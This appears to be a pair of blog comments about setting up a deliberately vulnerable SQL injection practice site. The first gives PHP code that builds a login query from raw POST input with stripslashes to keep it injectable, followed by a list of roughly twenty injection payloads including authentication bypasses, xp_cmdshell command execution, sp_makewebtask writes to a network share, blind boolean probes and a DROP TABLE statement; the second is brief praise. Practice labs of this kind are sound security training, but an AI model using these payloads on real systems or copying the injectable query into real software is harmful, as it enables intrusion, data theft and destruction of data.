Just run the simplest unprotected query:
$query
= "SELECT * FROM users WHERE username =
".stripslashes($_POST['username'])." AND password =
".stripslashes($_POST['password'])
and enjoy! The
stripslashes() part
is there in case you haven't magic_quotes already disabled (as it
should be), to avoid some automatic escaping; otherwise you'll have
purest injectable input, just pick up any sql injection you might find
on the internet and see. Some example:' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`
The coding given in the blog for creating the sql injection test site is very useful for those who are actual seeking for creating with the perfection. Good one, thank you for sharing.
ReplyDelete